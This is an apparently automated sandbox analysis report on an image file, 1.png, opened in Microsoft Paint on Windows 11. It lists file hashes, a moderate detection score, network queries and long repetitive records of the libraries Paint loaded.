Edit tour

Windows Analysis Report
1.png

Overview

General Information

Sample name:	1.png
Analysis ID:	1586015
MD5:	8df4ac24ea37d95679dda12bbdf3d021
SHA1:	8c7881e04b2ec0e4f352e531ad02a31e79a36b53
SHA256:	1417811e6df4fa655aa70a388473d57e529526674011fd60a1ea56b86684118b
Infos:

Detection

Score:	48
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Creates files inside the system directory

Queries the volume information (name, serial number etc) of a device

Classification

Process Tree

System is w11x64_office

mspaint.exe (PID: 6668 cmdline: mspaint.exe "C:\Users\user\Desktop\1.png" MD5: ED77A474C513D8F7A1481EEB1C978AAB)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

⊘No yara matches

Sigma Signatures

⊘No Sigma rule has matched

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: 1.png

ReversingLabs: Detection: 21%

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: tse1.mm.bing.net

Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	File created: C:\Windows\Debug\WIA			Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	File created: C:\Windows\Debug\WIA\wiatrace.log			Jump to behavior

Source: classification engine

Classification label: mal48.winPNG@1/1@1/0

Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 1.png

ReversingLabs: Detection: 21%

Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: basepaint.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: painttools.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: pgs.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: enumhelper.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: imageprocessing.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: platformhelpers.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: provenancehelper.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: restartrecovery.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: reporting.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: aistore.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: mfc140u.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: concrt140.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: reporting.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: platformhelpers.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: reporting.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: reporting.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: provenancesdk.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: reporting.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: featurestaging.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: watermarker.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: libcrypto-3-x64.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: mrmcorer.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: windows.staterepositoryclient.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: windows.staterepositorycore.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: windows.ui.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: bcp47mrm.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: windows.ui.xaml.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: windows.globalization.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: winrttracing.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: directxdatabasehelper.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: efswrt.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: windows.shell.servicehostbuilder.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: inputhost.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: uiamanager.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: windowmanagementapi.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: windows.ui.immersive.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: sti.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: wiatrace.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: windows.ui.xaml.controls.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: uiautomationcore.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: windows.graphics.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: cfgmgr32.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: windows.applicationmodel.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: windows.energy.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: directmanipulation.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: msftedit.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: globinputhost.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: windows.ui.core.textinput.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: windows.web.http.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: threadpoolwinrt.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: pfclient.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Section loaded: twinapi.dll	Jump to behavior

Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe

File opened: C:\Windows\SYSTEM32\msftedit.dll

Jump to behavior

Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.Paint_11.2410.38.0_x64__8wekyb3d8bbwe\PaintApp\mspaint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

